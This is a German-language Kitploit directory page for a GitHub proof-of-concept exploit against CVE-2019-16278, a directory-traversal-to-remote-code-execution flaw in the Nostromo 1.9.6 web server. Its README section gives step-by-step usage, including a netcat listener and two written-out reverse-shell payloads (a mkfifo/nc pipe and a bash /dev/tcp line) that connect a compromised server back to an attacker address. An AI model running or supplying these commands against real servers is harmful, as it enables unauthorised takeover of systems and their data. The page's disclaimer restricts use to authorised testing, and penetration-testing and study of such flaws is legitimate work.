Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution — Ein nicht authentifizierter Angreifer kann den Server dazu zwingen, auf eine Shell-Datei wie ‘/bin/sh’ zu verweisen und beliebige Befehle auszuführen, da die URL nicht verifiziert wird, was zu einem Path Traversal auf beliebige Dateien führt, die im System vorhanden sind. Nostromo-Versionen wie 1.9.6 verifizieren diese URL nicht. | Kitploit
Tools/GitHubGitHub/cybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubcybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution

CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

Repository anzeigen
4vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Ein nicht authentifizierter Angreifer kann den Server dazu zwingen, auf eine Shell-Datei wie ‘/bin/sh’ zu verweisen und beliebige Befehle auszuführen, da die URL nicht verifiziert wird, was zu einem Path Traversal auf beliebige Dateien führt, die im System vorhanden sind. Nostromo-Versionen wie 1.9.6 verifizieren diese URL nicht.

Teilen

POC

Repository: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git

📜 Beschreibung

Dieses Repository enthält einen Python-Exploit für CVE-2019-16278, eine Schwachstelle in Nostromo 1.9.6 (einem Webserver). Die Schwachstelle ermöglicht Remote Code Execution (RCE) durch Ausnutzung von Directory Traversal, um beliebige Befehle auf dem Zielsystem auszuführen.

🚀 Funktionen

  • Ausführen benutzerdefinierter Shell-Befehle auf dem angreifbaren Ziel.
  • Unterstützung für Reverse-Shell-Payloads.
  • Möglichkeit, die Größe der Antwort des Ziels anzupassen.

🛠️ Voraussetzungen

  • Python 3.x
  • Ein Rechner, auf dem Nostromo 1.9.6 läuft (das angreifbare Ziel).
  • Netcat (nc) zum Abfangen von Reverse Shells.

⚙️ Verwendung

Schritt 1: Repository klonen

git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

Schritt 2: Exploit ausführen

python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]

Argumente:

ArgumentBeschreibungErforderlichStandard
-t, --targetDie IP-Adresse des ZielsJaKeiner
-p, --portDer Port des ZielsJaKeiner
-c, --commandDer auf dem Server auszuführende BefehlJaKeiner
-b, --bytesAnzahl der zu lesenden Bytes in der AntwortNein4096

🧑‍💻 Beispiele

Beispiel 1: whoami auf dem Ziel ausführen

python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"

Beispiel 2: Reverse Shell mit Netcat

Schritt 1: Starten Sie einen Netcat-Listener auf Ihrem Angriffsrechner:

nc -lvnp 443

Schritt 2: Führen Sie den Exploit mit einem Reverse-Shell-Payload aus:

python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"

Beispiel 3: Reverse Shell mit /dev/tcp

python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"

🔍 Schwachstellendetails

  • CVE: CVE-2019-16278
  • Betroffene Software: Nostromo 1.9.6 Webserver
  • Typ: Directory Traversal -> Remote Code Execution

⚠️ Haftungsausschluss

Dieses Tool ist nur für Bildungszwecke bestimmt. Verwenden Sie es nicht auf Systemen, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben. Unautorisierter Zugriff auf Systeme ist illegal. Nutzen Sie es verantwortungsvoll.

Tool herunterladen